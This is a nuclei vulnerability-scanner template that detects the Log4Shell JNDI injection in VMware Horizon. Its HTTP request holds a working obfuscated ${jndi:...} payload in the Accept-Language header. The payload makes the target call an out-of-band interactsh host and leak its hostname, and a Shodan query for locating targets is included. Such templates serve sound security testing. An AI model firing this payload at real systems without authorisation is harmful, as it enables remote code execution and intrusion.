nuclei-templates/vulnerabilities/vmware/vmware-horizon-log4j-jndi-r...

51 lines
1.7 KiB
YAML

id: vmware-horizon-log4j-jndi-rce
info:
name: VMware Horizon - JNDI Remote Code Execution (Apache Log4j)
author: johnk3r
severity: critical
description: |
VMware Horizon is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
reference:
- https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis
- https://www.vmware.com/security/advisories/VMSA-2021-0028.html
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
shodan-query: http.html:"VMware Horizon"
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,horizon,vmware,oast,kev
requests:
- raw:
- |
GET /portal/info.jsp HTTP/1.1
Host: {{Hostname}}
Accept-Language: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{{interactsh-url}}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
# Enhanced by md on 2022/10/06